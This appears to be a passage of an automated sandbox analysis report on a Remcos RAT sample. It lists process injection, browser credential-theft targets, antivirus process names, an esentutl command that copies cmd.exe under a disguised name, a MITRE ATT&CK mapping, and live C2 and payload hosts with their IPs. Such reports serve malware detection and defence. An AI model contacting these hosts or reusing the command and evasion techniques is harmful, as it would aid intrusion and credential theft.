                    Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                    Queues an APC in another process (thread injection)
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeThread APC queued: target process: C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe7_2_02FA2132
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe10_2_02892132
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe12_2_03012132
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FA9662 mouse_event,7_2_02FA9662
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /oJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exeJump to behavior
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerf
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerc
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerHJ\
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageri
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJ
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagersInfo/s
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerW
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerHJ\30
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managert
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4510115069.0000000000788000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                    Source: colorcpl.exe, 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerHJ\b
                    Source: colorcpl.exe, 00000007.00000003.2139804062.000000000079E000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000007.00000002.4510209869.000000000079E000.00000004.00000020.00020000.00000000.sdmp, logs.dat.7.drBinary or memory string: [Program Manager]
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_029AC246 cpuid 0_2_029AC246
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_028F5ACC
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: GetLocaleInfoA,0_2_028FA7C4
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: GetLocaleInfoA,0_2_028FA810
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_028F5BD8
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoA,7_2_02F9F90C
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,7_2_02FE2393
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,7_2_02FE20B6
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,7_2_02FE201B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,7_2_02FE2143
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_02FE2690
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_02FE24BC
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,7_2_02FD8484
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,7_2_02FE25C3
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,7_2_02FD896D
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,7_2_02FE1FD0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,7_2_02FE1D58
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,9_2_028B5ACC
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,9_2_028B5BD7
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFCode function: GetLocaleInfoA,9_2_028BA810
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,10_2_028D2393
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,10_2_028D20B6
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,10_2_028D201B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_2_028D2143
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_028D2690
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,10_2_028C8484
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_028D24BC
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,10_2_028D25C3
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoA,10_2_0288F90C
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,10_2_028C896D
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,10_2_028D1FD0
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,10_2_028D1D58
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,12_2_03052393
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,12_2_03052143
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,12_2_0305201B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,12_2_030520B6
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,12_2_03052690
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,12_2_030525C3
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,12_2_03048484
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,12_2_030524BC
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoA,12_2_0300F90C
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,12_2_0304896D
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,12_2_03051FD0
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,12_2_03051D58
                    Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_028F920C GetLocalTime,0_2_028F920C
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FAB69E GetComputerNameExW,GetUserNameW,7_2_02FAB69E
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FD9210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,7_2_02FD9210
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_028FB78C GetVersionExA,0_2_028FB78C
                    Source: C:\Windows\SysWOW64\colorcpl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                    Source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4510318610.0000000000CFF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2251996048.000000001F0E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2330151215.000000002B797000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: XjPA2pnUhC.exe PID: 2780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2684, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1520, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1200, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data7_2_02F9BA4D
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data10_2_0288BA4D
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0300BA4D
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\7_2_02F9BB6B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \key3.db7_2_02F9BB6B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\10_2_0288BB6B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: \key3.db10_2_0288BB6B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0300BB6B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: \key3.db12_2_0300BB6B

                    Remote Access Functionality

                    barindex
                    Detected Remcos RAT
                    Source: C:\Windows\SysWOW64\colorcpl.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-OGO4HJJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-OGO4HJJump to behavior
                    Source: C:\Windows\SysWOW64\SndVol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-OGO4HJ
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4510318610.0000000000CFF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2251996048.000000001F0E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2330151215.000000002B797000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: XjPA2pnUhC.exe PID: 2780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2684, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1520, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1200, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: cmd.exe7_2_02F9569A
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: cmd.exe10_2_0288569A
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: cmd.exe12_2_0300569A

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure1
                    Valid Accounts                    		1
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Command and Scripting Interpreter                    		1
                    Valid Accounts                    		1
                    Bypass User Account Control                    		1
                    Deobfuscate/Decode Files or Information                    		211
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol211
                    Input Capture                    		21
                    Encrypted Channel                    		Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts2
                    Service Execution                    		1
                    Windows Service                    		1
                    Valid Accounts                    		2
                    Obfuscated Files or Information                    		2
                    Credentials In Files                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares3
                    Clipboard Data                    		1
                    Remote Access Software                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron1
                    Registry Run Keys / Startup Folder                    		11
                    Access Token Manipulation                    		1
                    Timestomp                    		NTDS1
                    System Network Connections Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                    Windows Service                    		1
                    DLL Side-Loading                    		LSA Secrets2
                    File and Directory Discovery                    		SSHKeylogging213
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts322
                    Process Injection                    		1
                    Bypass User Account Control                    		Cached Domain Credentials45
                    System Information Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                    Registry Run Keys / Startup Folder                    		211
                    Masquerading                    		DCSync241
                    Security Software Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Valid Accounts                    		Proc Filesystem2
                    Virtualization/Sandbox Evasion                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                    Virtualization/Sandbox Evasion                    		/etc/passwd and /etc/shadow2
                    Process Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                    Access Token Manipulation                    		Network Sniffing1
                    Application Window Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd322
                    Process Injection                    		Input Capture1
                    System Owner/User Discovery                    		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1517948 Sample: XjPA2pnUhC.exe Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 48 apostlejob2.duckdns.org 2->48 50 maan2u.com 2->50 52 geoplugin.net 2->52 78 Suricata IDS alerts for network traffic 2->78 80 Found malware configuration 2->80 82 Malicious sample detected (through community Yara rule) 2->82 86 13 other signatures 2->86 8 XjPA2pnUhC.exe 1 6 2->8         started        13 Qzzgbhha.PIF 2->13         started        signatures3 84 Uses dynamic DNS services 48->84 process4 dnsIp5 54 maan2u.com 112.137.173.77, 443, 49704, 49705 TMVADS-APTM-VADSDCHostingMY Malaysia 8->54 42 C:\Users\Public\Qzzgbhha.url, MS 8->42 dropped 44 C:\Users\Public\Libraries\Qzzgbhha, data 8->44 dropped 88 Early bird code injection technique detected 8->88 90 Allocates memory in foreign processes 8->90 92 Queues an APC in another process (thread injection) 8->92 94 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 8->94 15 colorcpl.exe 3 16 8->15         started        20 cmd.exe 1 8->20         started        22 Qzzgbhha.PIF 8->22         started        24 esentutl.exe 2 8->24         started        96 Multi AV Scanner detection for dropped file 13->96 98 Machine Learning detection for dropped file 13->98 26 SndVol.exe 13->26         started        file6 signatures7 process8 dnsIp9 56 apostlejob2.duckdns.org 192.161.184.44, 2468, 49706 ASN-QUADRANET-GLOBALUS United States 15->56 58 geoplugin.net 178.237.33.50, 49707, 80 ATOM86-ASATOM86NL Netherlands 15->58 38 C:\ProgramData\remcos\logs.dat, data 15->38 dropped 60 Contains functionality to bypass UAC (CMSTPLUA) 15->60 62 Detected Remcos RAT 15->62 64 Contains functionalty to change the wallpaper 15->64 76 2 other signatures 15->76 28 esentutl.exe 2 20->28         started        32 conhost.exe 20->32         started        66 Early bird code injection technique detected 22->66 68 Allocates memory in foreign processes 22->68 34 SndVol.exe 22->34         started        40 C:\Users\Public\Libraries\Qzzgbhha.PIF, PE32 24->40 dropped 36 conhost.exe 24->36         started        70 Contains functionality to steal Chrome passwords or cookies 26->70 72 Contains functionality to steal Firefox passwords or cookies 26->72 74 Delayed program exit found 26->74 file10 signatures11 process12 file13 46 C:\Users\Public\alpha.pif, PE32 28->46 dropped 100 Drops PE files to the user root directory 28->100 102 Drops PE files with a suspicious file extension 28->102 104 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 28->104 106 Detected Remcos RAT 34->106 signatures14

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    XjPA2pnUhC.exe32%ReversingLabs
                    XjPA2pnUhC.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\Public\Libraries\Qzzgbhha.PIF100%Joe Sandbox ML
                    C:\Users\Public\Libraries\Qzzgbhha.PIF32%ReversingLabs
                    C:\Users\Public\alpha.pif0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://geoplugin.net/json.gp0%URL Reputationsafe
                    https://sectigo.com/CPS00%URL Reputationsafe
                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
                    http://ocsp.sectigo.com00%URL Reputationsafe
                    http://geoplugin.net/json.gp/C0%URL Reputationsafe
                    http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
                    http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl00%Avira URL Cloudsafe
                    http://geoplugin.net/json.gpJ0%Avira URL Cloudsafe
                    apostlejob2.duckdns.org100%Avira URL Cloudmalware
                    http://geoplugin.net/json.gp(0%Avira URL Cloudsafe
                    http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#0%Avira URL Cloudsafe
                    http://geoplugin.net/json.gpl#0%Avira URL Cloudsafe
                    http://geoplugin.net/json.gpW0%Avira URL Cloudsafe
                    http://www.pmail.com0%Avira URL Cloudsafe
                    http://geoplugin.net/json.gpSystem320%Avira URL Cloudsafe
                    http://ocsp.sectigo.com0C0%Avira URL Cloudsafe
                    https://maan2u.com/0%Avira URL Cloudsafe
                    https://maan2u.com/doc/233_Qzzgbhhaaml0%Avira URL Cloudsafe
                    https://maan2u.com:443/doc/233_Qzzgbhhaaml0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    apostlejob2.duckdns.org
                    		192.161.184.44
                    		truetrue
                      		unknown
                      geoplugin.net
                      		178.237.33.50
                      		truefalse
                        		unknown
                        maan2u.com
                        		112.137.173.77
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://geoplugin.net/json.gpfalse
                          • URL Reputation: safe
                          		unknown
                          apostlejob2.duckdns.orgtrue
                          • Avira URL Cloud: malware
                          		unknown
